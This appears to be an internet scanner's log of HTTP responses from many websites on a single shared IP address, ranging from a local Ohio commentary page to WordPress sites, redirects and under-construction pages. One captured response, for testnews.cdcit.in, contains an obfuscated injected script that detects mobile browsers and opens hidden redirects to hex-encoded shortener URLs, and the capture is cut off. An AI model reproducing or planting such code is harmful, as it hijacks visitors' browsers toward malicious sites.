    <!DOCTYPE html>
    <html>
    
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>ShadysideOh</title>
    <link rel="stylesheet" href="styles/owl.carousel.min.css">
    <link rel="stylesheet" href="styles/owl.theme.default.min.css">
    <link href="styles/style2.css" rel="stylesheet" type="text/css" />
    <style type="text/css">
    .auto-style1 {
    	color: #5F8EA9;
    	text-decoration: underline;
    }
    .auto-style2 {
    	margin-left: 0px;
    }
    .auto-style3 {
    	margin-top: 72px;
    }
    </style>
    </head>
    
    <body>
    
    <!-- Begin Container -->
    <div id="container">
    	<!-- Begin Masthead -->
    	<div id="masthead">
    		<h1 style="color: #FF8000">ShadysideOh.com</h1>
    		<h3>Shadyside, Ohio 43947</h3>
    	</div>
    	<!-- End Masthead -->
    	<!-- Begin Navigation -->
    	<div id="navigation">
    		<ul>
    			<li><a href="index.html">Home</a></li>
    			<li><a href="about/about.htm">About</a></li>
    			<li><a href="news/news.htm">News</a></li>
    			<li><a href="calendar/calendar.htm">Calendar</a></li>
    			<li><a href="photo_gallery/photo_gallery.htm">Photo Gallery</a></li>
    			<li><a href="information_links/information_links.htm">Links</a></li>
    			<li><a href="faq/faq.htm">FAQ</a></li>
    			<li><a href="contact/contact.htm">Contact</a></li>
    			<li><a href="history/history.htm">History</a></li>
    			<li><a href="comments/comments_copy(1).htm">Comments</a></li>
    			<li><a href="archive/archive.html">Archives</a></li>
    
    		</ul>
    		<p></p>
    		
    		
    	</div>
    	<!-- End Navigation -->
    	<!-- Begin Content -->
    	<div id="content" style="height: 1387px">
    		<img alt="" height="336" src="images/stick_figure_writing_with_black_pen_10885.png" width="342" />
    		<h2>Our Town</h2>
    		<div style="margin-bottom:20px;height:526px; border-bottom-style:solid">
    		
    			<img alt="Happy Holidays" src="images/cart_before_horse_22579-2.png" height="126" width="191">
    			<h3>Putting the Cart Before the Horse</h3>		
    			<p>Shadyside school superintendent Haswell appeared at council 
    			wanting the deed to the Hillview area. The proposed new school has 
    			not even went to a vote yet. Someone appears to be putting the cart 
    			before the horse. </p>
    			
    			<div>			
    				<img alt="Question" src="images/drone_follow_surveillance_anim_300_clr_17448.gif" height="134" width="133"><br>
    					<h2>Village Buys $14,000 Drone!!</h2>
    					<p>The Village can't operate the Pauline Swamburg sign, so 
    					how are they going to fly an overpriced drone. 
    					</p>									
    			</div>
    			
    		<div style="height: 375px" class="auto-style3">			
    			<div style="height: 260px; border:thin black solid;padding:3px;width:80%;margin-left:auto;margin-right:auto">
    				<div class="owl-carousel">
      					<div style="width:100%;height:250px"><div><img alt="Money House" src="images/money_house_pc_400_clr_1823.png" height="200px" width="100%" /></div>
    					<h4>Overpriced Shacks - Premium Price for bare minimum</h4> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/38Lincoln.png" height="200px" width="100%" /><h2>These Look a lot like...</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div><img alt="Internment Camp" src="images/internment.png" height="200px" width="100%" /></div>
    					<h2>These! (Internment Camp)</h2> </div>  					
    					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptLSide.png" height="200px" width="100%" /><h2>Where's the yards?</h2> </div>				  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptFront.png" height="200px" width="100%" /><h2>Kitchen and Front room all one across front</h2> </div>
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/41stAptSide.png" height="200px" width="100%" /><h2>Firetrap? No Back door!</h2> </div>				  					  				
      					<div style="width:100%;height:250px"> <div></div><img alt="Apartment" src="images/43rdAptSide.png" height="200px" width="100%" /><h2>Just Lipstick on a Pig</h2> </div>				  				
    					
    				</div>
    			</div>
    					
    				<h3><a href="Articles/slumlord.html">Shadyside's Slum Lords</a></h3>		
    				<p>A local slum lo
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · www.shadysideoh.com

    2026-01-02 05:15

    HTTP/1.1 302 Found
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 771
    date: Fri, 02 Jan 2026 05:15:31 GMT
    server: LiteSpeed
    cache-control: no-cache, no-store, must-revalidate, max-age=0
    location: https://www.shadysideoh.com/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  302 Found
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 302 Found
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Found
    </h2>
    <p>The document has been temporarily moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.open-iptv.net

    2026-01-02 05:09

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://open-iptv.net/
    x-litespeed-cache: miss
    content-length: 0
    date: Fri, 02 Jan 2026 05:09:13 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · kalangolaw.com

    2026-01-02 05:07

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    retry-after: 86400
    x-litespeed-cache-control: no-cache
    cache-control: no-cache, must-revalidate, max-age=0, no-store, private
    content-length: 2103
    date: Fri, 02 Jan 2026 05:07:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Kalangolaw is under construction
    
    <!doctype html>
    <html lang="en">
      <head>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Kalangolaw is under construction</title>
        <meta name="description" content="Kalangolaw" />
        <meta name="generator" content="Free UnderConstructionPage plugin for WordPress">
        <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900">    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/bootstrap.min.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/common.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=4.03" type="text/css">
    <link rel="stylesheet" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v=4.03" type="text/css">
    <link rel="icon" href="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/images/favicon.png" />
      </head>
    
      <body>
        <div id="hero-image">
          <img src="https://www.kalangolaw.com/wp-content/plugins/under-construction-page/themes/mad_designer/mad-designer.png" alt="Mad Designer at work" title="Mad Designer at work">
        </div>
        <div class="container">
    
          <div class="row">
            <div class="col-xs-12 col-md-12 col-lg-12">
              <h1>Sorry, we're doing some work on the site</h1>
            </div>
          </div>
    
          <div class="row">
            <div class="col-xs-12 col-md-8 col-md-offset-2 col-lg-offset-2 col-lg-8">
              <p class="content">Thank you for being patient. We are doing some work on the site and will be back shortly.</p>
            </div>
          </div>
    
          <div class="row" id="social">
            <div class="col-xs-12 col-md-12 col-lg-12">
              
            </div>
          </div>
    
        </div>
        
      </body>
    </html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · nexuxtalentpartner.site

    2026-01-02 05:04

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    permissions-policy: private-state-token-redemption=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com"), private-state-token-issuance=(self "https://www.google.com" "https://www.gstatic.com" "https://recaptcha.net" "https://challenges.cloudflare.com" "https://hcaptcha.com")
    link: <https://nexuxtalentpartner.site/wp-json/>; rel="https://api.w.org/"
    link: <https://nexuxtalentpartner.site/wp-json/wp/v2/pages/26>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://nexuxtalentpartner.site/>; rel=shortlink
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 05:04:55 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · moyo.goodybuy.xyz

    2026-01-02 05:04

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://moyo.goodybuy.xyz/wp-json/>; rel="https://api.w.org/"
    etag: "53094-1767200242;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 05:04:46 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.testnews.cdcit.in

    2026-01-02 05:03

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://testnews.cdcit.in/
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 05:03:59 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x62\x65\x53\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x6b\x67\x74\x35\x63\x315','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x72\x43\x67\x38\x63\x318','abs','-local-storage','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x67\x78\x79\x39\x63\x309','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x66\x74\x4f\x34\x63\x364','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x65\x75\x4a\x37\x63\x357','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x73\x6f\x4c\x32\x63\x382','floor','\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x2d\x73\x68\x6f\x72\x74\x2e\x6e\x65\x74\x2f\x61\x41\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · antonsol.com

    2026-01-02 05:03

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://antonsol.com/wp-json/>; rel="https://api.w.org/"
    etag: "1013-1767330184;;;"
    x-litespeed-cache: miss
    content-length: 31626
    date: Fri, 02 Jan 2026 05:03:04 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Ant on Sol – Join the colony!
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Ant on Sol &#8211; Join the colony!</title>
    <meta name='robots' content='max-image-preview:large' />
    	<style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>
    	<link rel="alternate" type="application/rss+xml" title="Ant on Sol &raquo; Feed" href="https://antonsol.com/feed/" />
    <link rel="alternate" type="application/rss+xml" title="Ant on Sol &raquo; Comments Feed" href="https://antonsol.com/comments/feed/" />
    <script>
    window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/antonsol.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2"}};
    /*! This file is auto-generated */
    !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
    </script>
    
    <style id='wp-emoji-styles-inline-css'>
    
    	img.wp-smiley, img.emoji {
    		display: inline !important;
    		border: none !important;
    		box-shadow: none !important;
    		height: 1em !important;
    		width: 1em !important;
    		margin: 0 0.07em !important;
    		vertical-al
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · jadecare.co.uk

    2026-01-02 04:13

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache; private
    content-length: 6368
    date: Fri, 02 Jan 2026 04:13:06 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: My Blog
    
    <!DOCTYPE html>
    
    <html lang="en-US">
        <head>
        	<meta charset="UTF-8">
        	<meta name="viewport" content="width=device-width, initial-scale=1">
    
            <!-- SEO -->
    <title>My Blog</title><meta name="description" content="My WordPress Blog"/>
    <!-- og meta for facebook, googleplus -->
    <meta property="og:title" content="My Blog"/>
    <meta property="og:description" content="My WordPress Blog"/>
    <meta property="og:url" content="https://jadecare.co.uk"/>
    <meta property="og:type" content="website" />
    <meta property="og:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <!-- twitter meta -->
    <meta name="twitter:card" content="summary_large_image"/>
    <meta name="twitter:title" content="My Blog"/>
    <meta name="twitter:description" content="My WordPress Blog"/>
    <meta name="twitter:url" content="https://jadecare.co.uk"/>
    <meta name="twitter:image" content="https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2-1024x576.jpg"/>
    
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/themes/hardwork/style.css?v=4.1.15" type="text/css" media="all">
    <link rel="stylesheet" href="https://jadecare.co.uk/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" rel="stylesheet" >
    <link href="https://fonts.googleapis.com/css?family=Playfair+Display:700%7CMontserrat:400,700,400&amp;subset=latin-ext,cyrillic,latin,vietnamese,cyrillic-ext" rel="stylesheet">
    
    
            <style>
                body,input {font-family:'Montserrat', 'sans-serif';color:#ffffff;}
                                .social-list {background-color: rgba(0,0,0,0.4);}
                                a {color:#ffffff;}
                h1,h2,h3,h4,h5,h6 {font-family:'Playfair Display', 'sans-serif';}
                body {font-size:17px; letter-spacing: 0px; font-weight:400;; }
                h1:not(.text-logo),h2, h3,h4,h5,h6,.text-logo-wrapper {font-size:2.3529411764706em;letter-spacing: 0px; font-weight:700;font-style: normal;; }
                h1 {font-weight:700;font-style: normal;;}
            </style>
    
            
    
    <style>
        .wp-video {margin: 0 auto;}
        .wp-video-shortcode {max-width: 100%;}
        .grecaptcha-badge {display: none!important;}
        .text-logo {display: inline-block;}
        #gdpr-checkbox {-webkit-appearance: checkbox;-moz-appearance: checkbox;width: initial;height: initial;}
        #counter.expired {display: none; }
        input, button {
            box-shadow: inset 0 0 0 0 !important;
            -webkit-box-shadow: inset 0 0 0 0 !important;
            -webkit-appearance: none;
            outline: none;
        }
    </style>
    
    
    
    
        </head>
    
    
        <body id="body">
            <div id="background-wrapper">
    
             <div id="background-image" class="image" style="background-image:url('https://jadecare.co.uk/wp-content/uploads/2025/10/Jadecare-slide2.jpg')"></div>
            </div>
    
            
            <section class="section section-body">
                         
             </section>
            
        <!-- Fade in background image after load -->
        <script>
            window.addEventListener("load",function(event) {
                init();
            });
    
            function init(){
    
                var image = document.getElementById('background-image');
                var body = document.getElementById('body');
                
                if ( image === null ) {
                    image = document.getElementById('body');
                } 
    
                if ( image != null ) {
                    if ( image.className !== 'image-unsplash') {
                        image.classList.add('loaded');
                        body.classList.add('loaded');
                    }
                }
    
                        }
        </script>
    
        
        <script>
            /* Subscribe form script */
            var ajaxWpUrl = 'https://jadecare.co.uk/wp-admin/admin-ajax.php';
            var {pathname} = new URL(ajaxWpUrl);
            var ajaxurl = `${location.protocol}//${location.hostname}${pathname}`;
            var
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:80 · testnews.cdcit.in

    2026-01-02 03:56

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 03:56:03 GMT
    server: LiteSpeed
    location: https://testnews.cdcit.in/
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.modecart.store

    2026-01-02 03:47

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html
    last-modified: Sat, 10 Oct 2020 19:37:25 GMT
    accept-ranges: bytes
    content-length: 163
    date: Fri, 02 Jan 2026 03:47:03 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    
    <html><head><META HTTP-EQUIV="Cache-control" CONTENT="no-cache"><META HTTP-EQUIV="refresh" CONTENT="0;URL=/cgi-sys/defaultwebpage.cgi"></head><body></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · drsat.net

    2026-01-02 03:37

    HTTP/1.1 200 OK
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    link: <https://drsat.net/wp-json/>; rel="https://api.w.org/"
    etag: "10317-1767310363;;;"
    x-litespeed-cache: hit
    transfer-encoding: chunked
    date: Fri, 02 Jan 2026 03:37:11 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · brilliantsit.com

    2026-01-02 03:12

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html
    content-length: 795
    date: Fri, 02 Jan 2026 03:12:08 GMT
    server: LiteSpeed
    location: https://ninetyninecreatives.com/wp-content/cache/wp-rocket/brilliantsit.com/index-https.html
    vary: Accept-Encoding
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title:  301 Moved Permanently
    
    
    <!DOCTYPE html>
    <html style="height:100%">
    <head>
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <title> 301 Moved Permanently
    </title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>
    <body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">
    <div style="height:auto; min-height:100%; ">     <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">
            <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1>
    <h2 style="margin-top:20px;font-size: 30px;">Moved Permanently
    </h2>
    <p>The document has been permanently moved.</p>
    </div></div></body></html>
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · rwd.ae

    2026-01-02 02:52

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://www.rwd.ae/
    content-length: 0
    date: Fri, 02 Jan 2026 02:52:26 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · www.flamecharismatic.org.uk

    2026-01-02 02:06

    HTTP/1.1 301 Moved Permanently
    keep-alive: timeout=5, max=100
    content-type: text/html; charset=UTF-8
    x-redirect-by: WordPress
    location: https://flamecharismatic.org.uk/
    content-length: 0
    date: Fri, 02 Jan 2026 02:06:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Found 2026-01-02 by HttpPlugin
    Create report
  • Open service 162.0.235.244:443 · tiopelon.devdecimosite2025.com

    2026-01-02 01:48

    HTTP/1.1 500 Internal Server Error
    keep-alive: timeout=5, max=100
    link: <https://tiopelon.devdecimosite2025.com/wp-json/>; rel="https://api.w.org/"
    link: <https://tiopelon.devdecimosite2025.com/wp-json/wp/v2/pages/1490>; rel="alternate"; title="JSON"; type="application/json"
    link: <https://tiopelon.devdecimosite2025.com/>; rel=shortlink
    content-type: text/html; charset=UTF-8
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0, no-store, private
    x-litespeed-cache: miss
    content-length: 2892
    date: Fri, 02 Jan 2026 01:48:16 GMT
    server: LiteSpeed
    x-turbo-charged-by: LiteSpeed
    connection: close
    
    Page title: Tio Pelon – Tio Pelon SiteWordPress › Error
    
    
    <!DOCTYPE html>
    <html lang="en-US">
    <head>
    <meta charset="UTF-8">
